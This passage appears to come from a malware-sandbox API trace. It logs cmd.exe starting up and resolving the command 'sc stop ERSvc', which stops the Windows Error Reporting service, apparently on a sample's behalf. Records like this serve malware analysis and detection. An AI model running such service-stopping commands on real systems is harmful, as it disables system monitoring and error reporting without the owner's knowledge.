0x7689bfff entry_point = 0x767d168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 792 start_va = 0x768a0000 end_va = 0x768fffff entry_point = 0x768b158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 793 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 794 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 795 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 796 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 797 start_va = 0x730000 end_va = 0x8b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 798 start_va = 0x8c0000 end_va = 0x1cbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 799 start_va = 0x1cc0000 end_va = 0x2002fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001cc0000" filename = "" Region: id = 931 start_va = 0x2010000 end_va = 0x22defff entry_point = 0x2010000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 27 os_tid = 0xa98 [0021.168] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x36fba4 | out: lpSystemTimeAsFileTime=0x36fba4*(dwLowDateTime=0x14374760, dwHighDateTime=0x1d35d7b)) [0021.168] GetCurrentProcessId () returned 0xa94 [0021.168] GetCurrentThreadId () returned 0xa98 [0021.168] GetTickCount () returned 0x146a0 [0021.168] QueryPerformanceCounter (in: lpPerformanceCount=0x36fb9c | out: lpPerformanceCount=0x36fb9c*=323928220) returned 1 [0021.176] GetModuleHandleA (lpModuleName=0x0) returned 0x4a510000 [0021.424] __set_app_type (_Type=0x1) [0021.424] __p__fmode () returned 0x76d831f4 [0021.424] __p__commode () returned 0x76d831fc [0021.424] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a5321a6) returned 0x0 [0021.425] __getmainargs (in: _Argc=0x4a534238, _Argv=0x4a534240, _Env=0x4a53423c, _DoWildCard=0, _StartInfo=0x4a534140 | out: _Argc=0x4a534238, _Argv=0x4a534240, _Env=0x4a53423c) returned 0 [0021.425] GetCurrentThreadId () returned 0xa98 [0021.425] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa98) returned 0x60 [0021.426] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76a20000 [0021.427] GetProcAddress (hModule=0x76a20000, lpProcName="SetThreadUILanguage") returned 0x76a4a84f [0021.427] SetThreadUILanguage (LangId=0x0) returned 0x409 [0021.427] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0021.427] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x36fb34 | out: phkResult=0x36fb34*=0x0) returned 0x2 [0021.427] VirtualQuery (in: lpAddress=0x36fb6b, lpBuffer=0x36fb04, dwLength=0x1c | out: lpBuffer=0x36fb04*(BaseAddress=0x36f000, AllocationBase=0x270000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0021.427] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x36fb04, dwLength=0x1c | out: lpBuffer=0x36fb04*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0021.427] VirtualQuery (in: lpAddress=0x271000, lpBuffer=0x36fb04, dwLength=0x1c | out: lpBuffer=0x36fb04*(BaseAddress=0x271000, AllocationBase=0x270000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0021.427] VirtualQuery (in: lpAddress=0x273000, lpBuffer=0x36fb04, dwLength=0x1c | out: lpBuffer=0x36fb04*(BaseAddress=0x273000, AllocationBase=0x270000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0021.427] VirtualQuery (in: lpAddress=0x370000, lpBuffer=0x36fb04, dwLength=0x1c | out: lpBuffer=0x36fb04*(BaseAddress=0x370000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x20000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0021.427] GetConsoleOutputCP () returned 0x1b5 [0021.427] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a534260 | out: lpCPInfo=0x4a534260) returned 1 [0021.427] SetConsoleCtrlHandler (HandlerRoutine=0x4a52e72a, Add=1) returned 1 [0021.428] _get_osfhandle (_FileHandle=1) returned 0x7 [0021.428] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0021.428] _get_osfhandle (_FileHandle=1) returned 0x7 [0021.428] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5341ac | out: lpMode=0x4a5341ac) returned 1 [0021.429] _get_osfhandle (_FileHandle=1) returned 0x7 [0021.429] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0021.429] _get_osfhandle (_FileHandle=0) returned 0x3 [0021.429] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5341b0 | out: lpMode=0x4a5341b0) returned 1 [0021.429] _get_osfhandle (_FileHandle=0) returned 0x3 [0021.429] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0021.429] GetEnvironmentStringsW () returned 0x3a2018* [0021.429] FreeEnvironmentStringsW (penv=0x3a2018) returned 1 [0021.429] GetEnvironmentStringsW () returned 0x3a2018* [0021.430] FreeEnvironmentStringsW (penv=0x3a2018) returned 1 [0021.430] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x36eaa4 | out: phkResult=0x36eaa4*=0x68) returned 0x0 [0021.430] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x36eaac, lpData=0x36eab0, lpcbData=0x36eaa8*=0x1000 | out: lpType=0x36eaac*=0x0, lpData=0x36eab0*=0x0, lpcbData=0x36eaa8*=0x1000) returned 0x2 [0021.430] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x36eaac, lpData=0x36eab0, lpcbData=0x36eaa8*=0x1000 | out: lpType=0x36eaac*=0x4, lpData=0x36eab0*=0x1, lpcbData=0x36eaa8*=0x4) returned 0x0 [0021.430] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x36eaac, lpData=0x36eab0, lpcbData=0x36eaa8*=0x1000 | out: lpType=0x36eaac*=0x0, lpData=0x36eab0*=0x1, lpcbData=0x36eaa8*=0x1000) returned 0x2 [0021.430] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x36eaac, lpData=0x36eab0, lpcbData=0x36eaa8*=0x1000 | out: lpType=0x36eaac*=0x4, lpData=0x36eab0*=0x0, lpcbData=0x36eaa8*=0x4) returned 0x0 [0021.430] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x36eaac, lpData=0x36eab0, lpcbData=0x36eaa8*=0x1000 | out: lpType=0x36eaac*=0x4, lpData=0x36eab0*=0x40, lpcbData=0x36eaa8*=0x4) returned 0x0 [0021.430] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x36eaac, lpData=0x36eab0, lpcbData=0x36eaa8*=0x1000 | out: lpType=0x36eaac*=0x4, lpData=0x36eab0*=0x40, lpcbData=0x36eaa8*=0x4) returned 0x0 [0021.430] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x36eaac, lpData=0x36eab0, lpcbData=0x36eaa8*=0x1000 | out: lpType=0x36eaac*=0x0, lpData=0x36eab0*=0x40, lpcbData=0x36eaa8*=0x1000) returned 0x2 [0021.430] RegCloseKey (hKey=0x68) returned 0x0 [0021.430] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x36eaa4 | out: phkResult=0x36eaa4*=0x68) returned 0x0 [0021.431] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x36eaac, lpData=0x36eab0, lpcbData=0x36eaa8*=0x1000 | out: lpType=0x36eaac*=0x0, lpData=0x36eab0*=0x40, lpcbData=0x36eaa8*=0x1000) returned 0x2 [0021.431] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x36eaac, lpData=0x36eab0, lpcbData=0x36eaa8*=0x1000 | out: lpType=0x36eaac*=0x4, lpData=0x36eab0*=0x1, lpcbData=0x36eaa8*=0x4) returned 0x0 [0021.431] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x36eaac, lpData=0x36eab0, lpcbData=0x36eaa8*=0x1000 | out: lpType=0x36eaac*=0x0, lpData=0x36eab0*=0x1, lpcbData=0x36eaa8*=0x1000) returned 0x2 [0021.431] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x36eaac, lpData=0x36eab0, lpcbData=0x36eaa8*=0x1000 | out: lpType=0x36eaac*=0x4, lpData=0x36eab0*=0x0, lpcbData=0x36eaa8*=0x4) returned 0x0 [0021.431] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x36eaac, lpData=0x36eab0, lpcbData=0x36eaa8*=0x1000 | out: lpType=0x36eaac*=0x4, lpData=0x36eab0*=0x9, lpcbData=0x36eaa8*=0x4) returned 0x0 [0021.431] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x36eaac, lpData=0x36eab0, lpcbData=0x36eaa8*=0x1000 | out: lpType=0x36eaac*=0x4, lpData=0x36eab0*=0x9, lpcbData=0x36eaa8*=0x4) returned 0x0 [0021.431] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x36eaac, lpData=0x36eab0, lpcbData=0x36eaa8*=0x1000 | out: lpType=0x36eaac*=0x0, lpData=0x36eab0*=0x9, lpcbData=0x36eaa8*=0x1000) returned 0x2 [0021.431] RegCloseKey (hKey=0x68) returned 0x0 [0021.431] time (in: timer=0x0 | out: timer=0x0) returned 0x5a0b3db4 [0021.431] srand (_Seed=0x5a0b3db4) [0021.431] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C sc stop ERSvc" [0021.431] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C sc stop ERSvc" [0021.431] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a535260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0021.433] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3a2020, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0021.433] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0021.433] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0021.433] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0021.433] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0021.433] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0021.433] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0021.433] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0021.433] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0021.433] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0021.433] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0021.433] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0021.433] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0021.433] GetEnvironmentStringsW () returned 0x3a2230* [0021.433] FreeEnvironmentStringsW (penv=0x3a2230) returned 1 [0021.433] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0021.433] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0021.433] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0021.433] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0021.433] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0021.433] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0021.433] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0021.434] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0021.434] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0021.434] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0021.434] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x36f870 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0021.434] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x36f870, lpFilePart=0x36f86c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x36f86c*="Desktop") returned 0x25 [0021.434] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0021.434] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x36f5ec | out: lpFindFileData=0x36f5ec) returned 0x3a1e98 [0021.434] FindClose (in: hFindFile=0x3a1e98 | out: hFindFile=0x3a1e98) returned 1 [0021.434] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x36f5ec | out: lpFindFileData=0x36f5ec) returned 0x3a1e98 [0021.434] FindClose (in: hFindFile=0x3a1e98 | out: hFindFile=0x3a1e98) returned 1 [0021.434] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0021.434] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x36f5ec | out: lpFindFileData=0x36f5ec) returned 0x3a1e98 [0021.434] FindClose (in: hFindFile=0x3a1e98 | out: hFindFile=0x3a1e98) returned 1 [0021.434] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0021.434] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0021.434] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0021.435] GetEnvironmentStringsW () returned 0x3a40a0* [0021.435] FreeEnvironmentStringsW (penv=0x3a40a0) returned 1 [0021.435] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a535260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0021.435] GetConsoleOutputCP () returned 0x1b5 [0021.435] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a534260 | out: lpCPInfo=0x4a534260) returned 1 [0021.435] GetUserDefaultLCID () returned 0x409 [0021.436] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a534950, cchData=8 | out: lpLCData=":") returned 2 [0021.436] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x36f9b0, cchData=128 | out: lpLCData="0") returned 2 [0021.436] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x36f9b0, cchData=128 | out: lpLCData="0") returned 2 [0021.436] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x36f9b0, cchData=128 | out: lpLCData="1") returned 2 [0021.436] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a534940, cchData=8 | out: lpLCData="/") returned 2 [0021.436] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a534d80, cchData=32 | out: lpLCData="Mon") returned 4 [0021.436] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a534d40, cchData=32 | out: lpLCData="Tue") returned 4 [0021.436] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a534d00, cchData=32 | out: lpLCData="Wed") returned 4 [0021.436] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a534cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0021.436] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a534c80, cchData=32 | out: lpLCData="Fri") returned 4 [0021.436] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a534c40, cchData=32 | out: lpLCData="Sat") returned 4 [0021.436] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a534c00, cchData=32 | out: lpLCData="Sun") returned 4 [0021.436] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a534930, cchData=8 | out: lpLCData=".") returned 2 [0021.436] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a534920, cchData=8 | out: lpLCData=",") returned 2 [0021.436] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0021.437] GetConsoleTitleW (in: lpConsoleTitle=0x3a2da8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0021.437] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76a20000 [0021.437] GetProcAddress (hModule=0x76a20000, lpProcName="CopyFileExW") returned 0x76a53b92 [0021.438] GetProcAddress (hModule=0x76a20000, lpProcName="IsDebuggerPresent") returned 0x76a34a5d [0021.438] GetProcAddress (hModule=0x76a20000, lpProcName="SetConsoleInputExeNameW") returned 0x76a4a79d [0021.438] _wcsicmp (_String1="sc", _String2=")") returned 74 [0021.438] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0021.438] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0021.438] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0021.438] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0021.438] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0021.438] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0021.439] GetConsoleTitleW (in: lpConsoleTitle=0x36f6a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0021.439] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0021.439] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0021.439] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0021.439] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0021.439] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0021.439] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0021.439] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0021.439] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0021.439] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0021.439] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0021.440] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0021.440] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0021.440] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0021.440] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0021.440] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0021.440] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0021.440] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0021.440] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0021.440] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0021.440] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0021.440] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0021.440] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0021.440] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0021.440] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0021.440] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0021.440] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0021.440] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0021.440] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0021.440] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0021.440] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0021.440] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0021.440] _wcsicmp (_String1="sc", _String2="START") returned -17 [0021.440] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0021.440] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0021.440] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0021.440] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0021.440] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0021.440] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0021.440] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0021.440] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0021.440] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0021.440] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0021.440] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0021.440] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0021.440] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0021.440] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0021.440] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0021.440] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0021.441] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0021.441] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0021.441] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0021.441] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0021.441] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0021.441] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0021.441] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0021.441] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0021.441] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0021.441] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0021.441] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0021.441] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0021.441] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0021.441] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0021.441] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0021.441] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0021.441] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0021.441] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0021.441] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0021.441] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0021.441] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0021.441] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0021.441] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0021.441] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0021.441] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0021.441] _wcsicmp (_String1="sc", _String2="START") returned -17 [0021.441] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0021.441] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0021.441] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0021.441] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0021.441] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0021.441] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0021.441] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0021.441] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0021.441] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0021.442] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0021.442] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0021.442] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0021.442] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0021.442] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0021.442] SetErrorMode (uMode=0x0) returned 0x0 [0021.442] SetErrorMode (uMode=0x1) returned 0x0 [0021.442] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3907f8, lpFilePart=0x36f1c8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x36f1c8*="Desktop") returned 0x25 [0021.442] SetErrorMode (uMode=0x0) returned 0x1 [0021.442] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0021.442] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0021.447] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0021.448] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0021.448] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x36ef44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ef44) returned 0xffffffff [0021.448] GetLastError () returned 0x2 [0021.449] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sc", fInfoLevelId=0x1, lpFindFileData=0x36ef44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ef44) returned 0xffffffff [0021.449] GetLastError () returned 0x2 [0021.449] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0021.449] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x36ef44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ef44) returned 0x3a3410 [0021.449] FindClose (in: hFindFile=0x3a3410 | out: hFindFile=0x3a3410) returned 1 [0021.449] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.COM", fInfoLevelId=0x1, lpFindFileData=0x36ef44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ef44) returned 0xffffffff [0021.449] GetLastError () returned 0x2 [0021.449] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.EXE", fInfoLevelId=0x1, lpFindFileData=0x36ef44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ef44) returned 0x3a3410 [0021.449] FindClose (in: hFindFile=0x3a3410 | out: hFindFile=0x3a3410) returned 1 [0021.449] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0021.449] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0021.449] GetConsoleTitleW (in: lpConsoleTitle=0x36f43c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b 